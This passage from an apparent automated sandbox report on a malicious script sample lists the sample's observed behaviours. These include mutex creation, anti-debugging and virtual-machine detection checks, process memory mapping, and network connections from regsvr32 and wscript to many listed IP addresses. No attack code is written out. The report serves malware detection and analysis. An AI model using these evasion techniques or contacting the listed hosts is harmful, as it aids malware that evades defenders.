Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C7AFC Sleep,ExitWindowsEx,	9_2_008C7AFC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01047AFC Sleep,ExitWindowsEx,	12_2_01047AFC

Creates mutexes

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\F5F09116011C9B82
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\9F829229C34A4DCB
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\6EA9A76B68F27661

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: String function: 02595E5C appears 69 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 008837FC appears 38 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 010037FC appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 008D111C appears 118 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 010035B4 appears 49 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 0105111C appears 116 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 01003590 appears 48 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 01003B60 appears 34 times
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: String function: 00B3111C appears 115 times
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: String function: 00AE3590 appears 51 times
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: String function: 00AE3B60 appears 34 times
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: String function: 00AE35B4 appears 50 times

Reads the hosts file

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

File read: C:\Windows\System32\drivers\etc\hosts

Searches for the Microsoft Outlook file path

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: wow64log.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Section loaded: phoneinfo.dll
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: vboxhook.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll

Java / VBScript file with very long strings (likely obfuscated code)

Show sources

Source: Ground-Label-004117618.doc-2161f8cf7b6c1a1a3a6fdc41083566a5.wsf

Initial sample: Strings found which are bigger than 50

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_02584C5D AllocateAndInitializeSid,SetEntriesInAclA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateEventA,LocalFree,FreeSid,

3_2_02584C5D

Contains functionality to create a new security descriptor

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_02584C5D AllocateAndInitializeSid,SetEntriesInAclA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateEventA,LocalFree,FreeSid,

3_2_02584C5D

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: regsvr32.exe	Binary or memory string: Progman
Source: regsvr32.exe	Binary or memory string: p Program Manager
Source: regsvr32.exe	Binary or memory string: Shell_TrayWnd

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: unknown target pid: 1468 protection: execute and read and write

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 6.229.172.61 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 223.124.128.110 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 178.206.221.61 443
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 153.187.92.74 443
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 6.162.77.29 443
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 2.103.78.106 443
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 118.22.123.46 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 47.245.139.213 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 180.39.200.223 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 135.6.106.192 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 66.126.95.191 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 99.31.115.100 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 35.203.79.165 80
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 213.186.33.17 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 195.231.77.115 443
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 60.141.168.136 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 15.241.211.182 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 13.61.215.22 443
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 5.196.237.72 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 124.185.68.95 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 156.57.155.8 80
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 185.5.53.28 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 134.160.52.194 443
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 22.140.104.108 443

Anti Debugging:

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02584F79 __EH_prolog,SetErrorMode,SetUnhandledExceptionFilter,GetSystemDefaultLangID,GetUserDefaultLangID,GetUserDefaultUILanguage,Sleep,CopyFileW,DeleteFileW,CreateThread,CloseHandle,GetLastError,RegOpenKeyExA,WaitForSingleObject,RegDeleteValueA,RegCloseKey,	3_2_02584F79
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_0258D598 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0258D598
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02584F79 __EH_prolog,SetErrorMode,SetUnhandledExceptionFilter,GetSystemDefaultLangID,GetUserDefaultLangID,GetUserDefaultUILanguage,Sleep,CopyFileW,DeleteFileW,CreateThread,CloseHandle,GetLastError,RegOpenKeyExA,WaitForSingleObject,RegDeleteValueA,RegCloseKey,	3_2_02584F79
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_0258EF7A SetUnhandledExceptionFilter,	3_2_0258EF7A
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02584F79 __EH_prolog,SetErrorMode,SetUnhandledExceptionFilter,GetSystemDefaultLangID,GetUserDefaultLangID,GetUserDefaultUILanguage,Sleep,CopyFileW,DeleteFileW,CreateThread,CloseHandle,GetLastError,RegOpenKeyExA,WaitForSingleObject,RegDeleteValueA,RegCloseKey,	3_2_02584F79
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025901E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_025901E2
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_1_00406B46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_1_00406B46
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_1_004071D4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_1_004071D4
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_1_00413C1F SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	3_1_00413C1F
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_1_0040DC7C SetUnhandledExceptionFilter,	3_1_0040DC7C
Source: C:\Windows\System32\conhost.exe	Code function: 8_2_00007FF6C8BE1C7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF6C8BE1C7C
Source: C:\Windows\System32\conhost.exe	Code function: 8_2_00007FF6C8BE19A0 SetUnhandledExceptionFilter,	8_2_00007FF6C8BE19A0

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

System information queried: KernelDebuggerInformation

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_0258B6BB rdtsc

3_2_0258B6BB

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_0258D598 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0258D598

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_0258FE77 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_0258FE77

Contains functionality to read the PEB

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AEA0B4 mov eax, dword ptr fs:[00000030h]		5_2_00AEA0B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0100A0B4 mov eax, dword ptr fs:[00000030h]		12_2_0100A0B4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe

Code function: 5_2_00402110 GetProcessHeap,GetCurrentThreadId,

5_2_00402110

Enables debug privileges

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025897BF __EH_prolog,FindFirstFileW,__wcsicoll,__wcsicoll,FindNextFileW,FindClose,	3_2_025897BF
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02587314 FindFirstFileW,FindClose,	3_2_02587314
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_1_0040200D CryptMsgCountersignEncoded,LoadMenuA,CreateMenu,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,CryptMsgDuplicate,GetStockObject,GetStockObject,SelectObject,GetStockObject,GetObjectA,SendMessageA,OffsetRect,GetPixel,BeginPaint,DrawTextA,DefWindowProcA,BeginPaint,GetClientRect,DrawTextA,EndPaint,PostQuitMessage,DefWindowProcA,GetDlgItem,CreateWindowExA,BeginPaint,SetWindowPos,SetWindowLongA,BeginPaint,MultiByteToWideChar,BeginPaint,MultiByteToWideChar,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowRect,GetCursorPos,PtInRect,SendMessageA,GetScrollPos,SetScrollPos,InvalidateRect,BeginPaint,LockResource,GetClientRect,DrawTextA,EndPaint,MoveWindow,SetFocus,FreeResource,PostQuitMessage,GetDC,GetTextMetricsA,ReleaseDC,GetSystemMetrics,CreateWindowExA,LoadStringA,FindResourceA,LoadResource,LockResource,CharNextA,SetScrollRange,SetScrollPos,SendMessageA,GetLastError,CreateWindowExA,ImageList_Create,SendMessageA,SendMessageA,ICLocate,ICOpen,ICSendMessage,ICClose,ICInfo,ICGetInfo,SendM	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B29E80 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B29E80
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AE5840 GetModuleHandleA,GetProcAddress,lstrcpy,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpy,lstrlen,lstrcpy,	5_2_00AE5840
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2B32C FindFirstFileW,FindClose,FileTimeToSystemTime,	5_2_00B2B32C
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2B08C FindFirstFileW,FindClose,FileTimeToSystemTime,	5_2_00B2B08C
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B163DC FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B163DC
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2B420 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B2B420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008CB32C FindFirstFileW,FindClose,FileTimeToSystemTime,	9_2_008CB32C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00885840 GetModuleHandleA,GetProcAddress,lstrcpy,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpy,lstrlen,lstrcpy,	9_2_00885840
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008D1E74 FindFirstFileW,6E15D4C0,6E15DFB0,6E15D4C0,FindNextFileW,FindClose,FindFirstFileW,RemoveDirectoryW,6E15DFB0,RemoveDirectoryW,FindNextFileW,FindClose,RemoveDirectoryW,6E15DFB0,RemoveDirectoryW,	9_2_008D1E74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008CB420 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	9_2_008CB420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008CB08C FindFirstFileW,FindClose,FileTimeToSystemTime,	9_2_008CB08C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008B63DC FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	9_2_008B63DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C9E80 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	9_2_008C9E80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0104B32C FindFirstFileW,FindClose,FileTimeToSystemTime,	12_2_0104B32C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_010363DC FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_010363DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01005840 GetModuleHandleA,GetProcAddress,lstrcpy,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpy,lstrlen,lstrcpy,	12_2_01005840
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0104B420 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_0104B420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01051E74 FindFirstFileW,6E15D4C0,6E15DFB0,6E15D4C0,FindNextFileW,FindClose,FindFirstFileW,RemoveDirectoryW,6E15DFB0,RemoveDirectoryW,FindNextFileW,FindClose,RemoveDirectoryW,6E15DFB0,RemoveDirectoryW,	12_2_01051E74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01049E80 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_01049E80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0104B08C FindFirstFileW,FindClose,FileTimeToSystemTime,	12_2_0104B08C

Contains functionality to query system information

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe

Code function: 5_2_00B357BC GetSystemInfo,

5_2_00B357BC

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: regsvr32.exe	Binary or memory string: ;tHyper-V RAW
Source: regsvr32.exe	Binary or memory string: Hyper-V RAWm
Source: a2.exe	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: wscript.exe	Binary or memory string: Hyper-V RAWC
Source: wscript.exe, regsvr32.exe	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, a1.exe	Binary or memory string: A virtual machine could not be started because Hyper-V is not installed.
Source: powershell.exe	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: a1.exe	Binary or memory string: Hyper-V RAWN
Source: regsvr32.exe	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe	Binary or memory string: \??\C:\WINDOWS\system32\drivers\vpc-s3.sysQ

Queries a list of all running processes

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains capabilities to detect virtual machines

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_0258B6BB rdtsc

3_2_0258B6BB

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe

Thread delayed: delay time: -1000

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Window / User API: threadDelayed 512
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 549
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 905
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 502
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 885

Found decision node followed by non-executed suspicious APIs

Show sources

